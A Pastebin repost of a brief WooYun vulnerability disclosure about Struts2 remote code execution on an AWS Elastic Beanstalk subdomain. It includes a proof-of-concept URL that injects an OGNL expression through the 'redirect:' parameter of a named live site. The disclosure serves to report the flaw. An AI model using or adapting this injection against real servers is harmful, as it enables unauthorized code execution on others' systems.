API tools faq
paste
Advertisement
AndrewHaxalot

AWS Elastic Beanstalk Code Execution

AndrewHaxalot
Dec 29th, 2013
90
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.61 KB | None | 0 0
raw download clone embed print report
  1. *Form:*http://en.wooyun.org/bugs/wooyun-2013-040
  2.  
  3.  
  4. *Abstract£º*
  5.  
  6. AWS Elastic Beanstalk is an even easier way for you to quickly deploy and
  7. manage applications in the AWS cloud. elasticbeanstalk subdomain exists
  8. Struts2 code execution .
  9.  
  10. *Details£º*
  11.  
  12. poc return [/ok]:
  13. http://jewelopoly.elasticbeanstalk.com/login.action?redirect:${%23w%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse').getWriter(),%23w.println('[/ok]'),%23w.flush(),%23w.close()}
  14.  
  15. --
  16. WooYun, an Open and Free Vulnerability Reporting Platform
  17.  
  18. For more information, please visit http://en.wooyun.org/about.php
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!